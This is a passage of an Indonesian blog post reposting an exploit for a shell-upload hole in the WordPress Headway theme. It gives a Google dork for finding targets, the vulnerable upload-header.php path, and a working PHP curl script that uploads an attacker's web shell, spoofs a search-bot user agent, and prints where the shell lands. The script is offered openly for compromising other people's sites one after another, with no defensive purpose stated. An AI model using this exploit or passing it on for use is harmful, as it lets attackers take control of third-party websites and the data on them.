Flash Go
» » » » Wordpress Headway Themes Shell Upload Vulnerability

Wordpress Headway Themes Shell Upload Vulnerability

Wordpress Headway Themes Shell Upload Vulnerability - Hallo sahabat Minato ET, Pada Artikel yang anda baca kali ini dengan judul Wordpress Headway Themes Shell Upload Vulnerability, kami telah mempersiapkan artikel ini dengan baik untuk anda baca dan ambil informasi didalamnya. mudah-mudahan isi postingan Artikel Aribitraty, Artikel Uploadify, Artikel Wordpress, yang kami tulis ini dapat anda pahami. baiklah, selamat membaca.

Judul : Wordpress Headway Themes Shell Upload Vulnerability
link : Wordpress Headway Themes Shell Upload Vulnerability

Baca juga


Wordpress Headway Themes Shell Upload Vulnerability



#-Title: Wordpress Headway Themes Shell Upload Vulnerability
#-Author: Anonymously
#-Date: 10/27/2015
#- Vendor : headwaythemes. com
#- Developer : Clay Griffith
#- Link Download : headwaythemes. com/pricing/
#-Google Dork: inurl:wp-content/themes/headway-(random)
#- Tested on : Trusty Tahr
#- Fixed in ??
==========================================================================

·        Vulnerability : /wp-content/themes/headway-(random)/library/visual-editor/lib/upload-header.php 
·         When Vulnerable /home/localhost/public_html/


Proof Of Concept :


Tools Coded by Mr.MaGnoM

<?php

/*link of tool with vedio : http://magsec.blogspot.com/2015/10/wordpress-headway-upload-shell-exploit.htmlcoded by mr magnommore tools visit my blog  ==> magsec.blogspot.com  :)
so why i didnt make auto exploiter because theme headway dont have one namefor example u will filn /headway-2014/ and  /headway-2015/ or /headway-163/  , /headway-120/so is soo defficult to make auto exploiter so u must cheek firstly complet name of theme than
write it on site.com/wp-content/themes/headway(complet name)/library/visual-editor/lib/upload-header.php
shell go to  : site/wp-content/uploads/headway/header-uploads/shell is stabl for all site
that script on php for exploit site by site :/
to understand good watch video : http://magsec.blogspot.com/2015/10/wordpress-headway-upload-shell-exploit.html*/

$url="3xploi7.id"; // link here
$file="lolz.php ";   // ur shell here
$post = array('Filedata'=>"@$file") ;$ch = curl_init();curl_setopt ($ch, CURLOPT_URL, "$url");curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_POSTFIELDS,$post);curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);$data = curl_exec($ch);curl_close($ch);//print $data;if($data=="1"){  echo "\nexploited\nshell : site/wp-content/uploads/headway/header-uploads/$file \n";}else{  echo "\nnot infected\n";}
?>

Shell Acces ?  Here




Demikianlah Artikel Wordpress Headway Themes Shell Upload Vulnerability

Sekianlah artikel Wordpress Headway Themes Shell Upload Vulnerability kali ini, mudah-mudahan bisa memberi manfaat untuk anda semua. baiklah, sampai jumpa di postingan artikel lainnya.

Anda sekarang membaca artikel Wordpress Headway Themes Shell Upload Vulnerability dengan alamat link https://minatoet.blogspot.com/2015/10/wordpress-headway-themes-shell-upload.html

0 Response to "Wordpress Headway Themes Shell Upload Vulnerability"

Post a Comment

Subscribe to: Post Comments (Atom)